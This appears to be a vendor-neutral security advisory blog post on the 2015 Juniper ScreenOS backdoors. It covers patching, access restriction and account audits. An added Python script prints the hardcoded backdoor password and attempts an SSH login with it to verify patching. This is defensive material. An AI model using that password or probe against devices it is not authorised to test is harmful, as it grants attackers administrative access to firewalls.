UPDATE (December 23): We have since learned that renaming administrative usernames on an unpatched Juniper device does not prevent compromise; the hardcoded password is accepted together with any existing account name. Patching is the only effective fix, and Juniper customers should apply it immediately.
On December 17, Juniper Networks disclosed two backdoors in its ScreenOS software, which runs on its NetScreen Series enterprise firewalls.
The first backdoor (CVE-2015-7755) allows an attacker to authenticate over SSH or Telnet using a hardcoded password together with any existing username. The second (CVE-2015-7756) allows a “knowledgeable attacker” who can monitor VPN traffic to decrypt it. (Juniper’s advisory is here: http://forums.juniper.net/t5/Security-Incident-Response/Important-Announcement-about-ScreenOS/ba-p/285554.)
Juniper says the code was found during an internal review of its software. It is likely that some adversary was caught using these backdoors, but we will probably never know for sure. Given the nature of these backdoors, it is unlikely that Juniper is the only security vendor affected. For this reason, security products from every vendor, not just Juniper, should be treated as suspect.
Why the backdoors were in the software, and how they got there, are secondary concerns from NSS’ perspective. The most important question security administrators should be asking is “What do we do now?”
NSS advises the following actions:
- Juniper customers should immediately patch the impacted systems.
- All administrators (not just Juniper customers) should restrict remote management access to their firewalls, SSH and Telnet included, to trusted management hosts or networks.
- All administrators should still replace default or predictable administrative usernames such as “root” and “admin” with nonspecific, hard-to-guess names (e.g., “Th1$is8AD”) as general hardening. Note, however, that this does not mitigate CVE-2015-7755: the hardcoded password is accepted with any existing username (see the update above), so Juniper customers who cannot patch immediately gain no protection from renaming alone.
- After patching, verify from outside the device that the backdoor is actually closed, for example with Metasploit or another penetration-testing tool that attempts the backdoor login.
- Educate your network teams about the issue. Don’t assume networking teams understand or track these issues with the same intensity as security teams.
- Confirm that every administrator-level account on your security products is legitimate and expected. Attackers who have gained administrative access often create their own accounts, so patching alone will not remove their access.
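The following Python script is an added example for this post, not Juniper’s or NSS’ own tooling. It covers two of the steps above: probing a firewall over SSH with the publicly documented CVE-2015-7755 password to confirm the backdoor login is rejected, and listing the admin accounts in a `get config` dump so any account not on your approved list stands out. It assumes the paramiko library is installed, that the default `netscreen` admin account still exists, that `set admin user` lines look like the constructed sample (adjust the pattern to your device’s output), and that you are authorised to test the device. Host names and the approved-user set are placeholders.

```python
"""ScreenOS backdoor probe and admin-account audit (added example, not vendor code).

Assumes: paramiko is installed, the default "netscreen" admin exists, the
"set admin user" lines look like the constructed sample below, and you are
authorised to test the firewall. Hosts and approved-user lists are placeholders.
"""
import re
import sys

# Hardcoded password documented publicly after Juniper's disclosure.
# The backdoored login routine accepts it for any existing admin username,
# which is why renaming "root" or "admin" does not close the hole.
BACKDOOR_PASSWORD = "<<< %s(un='%s') = %u"

# Constructed sample of "get config" output (not captured from a real device).
SAMPLE_CONFIG = """\
set admin name "netscreen"
set admin user "netscreen" password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn" privilege "all"
set admin user "fw-ops" password "nD0nNcrbOGzDcqkGNsHIcyFt8nCqSn" privilege "read-only"
set admin user "svc_backup" password "nJpKM3rtGXzFcrkGNsLIdiEt5nA9Un" privilege "all"
set admin ssh port 22
"""

# One "set admin user" line: username, optional password hash, optional privilege.
ADMIN_USER_RE = re.compile(
    r'^set admin user "([^"]+)"(?: password "[^"]*")?(?: privilege "([^"]+)")?',
    re.MULTILINE,
)


def list_admin_users(config_text):
    """Return (username, privilege) pairs defined in a ScreenOS config dump."""
    return [(m.group(1), m.group(2) or "unspecified")
            for m in ADMIN_USER_RE.finditer(config_text)]


def unexpected_admins(config_text, approved):
    """Admin accounts present on the device but not in the approved set."""
    return sorted(user for user, _ in list_admin_users(config_text)
                  if user not in approved)


def probe_ssh(host, username="netscreen", port=22, timeout=10):
    """Attempt an SSH login with the backdoor password.

    Returns True if the device accepted it (still backdoored) and False if the
    login was rejected. Network and protocol errors propagate to the caller so
    a connection failure is never mistaken for a passed check.
    """
    import paramiko  # third-party; imported here so the offline audit runs without it

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=username,
                       password=BACKDOOR_PASSWORD, look_for_keys=False,
                       allow_agent=False, timeout=timeout)
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()
    return True


if __name__ == "__main__":
    # Usage: python screenos_check.py <firewall-host> [admin-username]
    target = sys.argv[1] if len(sys.argv) > 1 else None
    user = sys.argv[2] if len(sys.argv) > 2 else "netscreen"

    print("Admin accounts in sample config:", list_admin_users(SAMPLE_CONFIG))
    print("Not on approved list:",
          unexpected_admins(SAMPLE_CONFIG, {"netscreen", "fw-ops"}))

    if target:
        if probe_ssh(target, user):
            print(f"{target}: VULNERABLE - backdoor password accepted for '{user}'")
        else:
            print(f"{target}: backdoor password rejected for '{user}'")
```

Two caveats when using this. First, a connection that fails before authentication (timeout, unreachable host, or an SSH key-exchange or cipher mismatch with an old ScreenOS build) is a connectivity problem, not evidence that the backdoor is closed; only an explicit authentication rejection counts as a pass. Second, the same password is accepted over Telnet, which this example does not probe, so test that path too if Telnet management is still enabled.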
If you have additional questions, please reach out. We are here to help.